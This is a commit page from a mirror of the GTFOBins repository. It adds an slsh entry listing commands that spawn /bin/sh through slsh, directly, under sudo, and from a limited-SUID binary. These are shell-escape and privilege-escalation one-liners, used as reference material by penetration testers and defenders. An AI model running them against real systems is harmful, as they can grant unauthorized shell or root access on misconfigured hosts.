mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Create slsh.md
This commit is contained in:
parent
03c30e9944
commit
e242e92634
9
_gtfobins/slsh.md
Normal file
9
_gtfobins/slsh.md
Normal file
@ -0,0 +1,9 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: slsh -e 'system("/bin/sh")'
|
||||||
|
sudo:
|
||||||
|
- code: sudo slsh -e 'system("/bin/sh")'
|
||||||
|
limited-suid:
|
||||||
|
- code: ./slsh -e 'system("/bin/sh")'
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user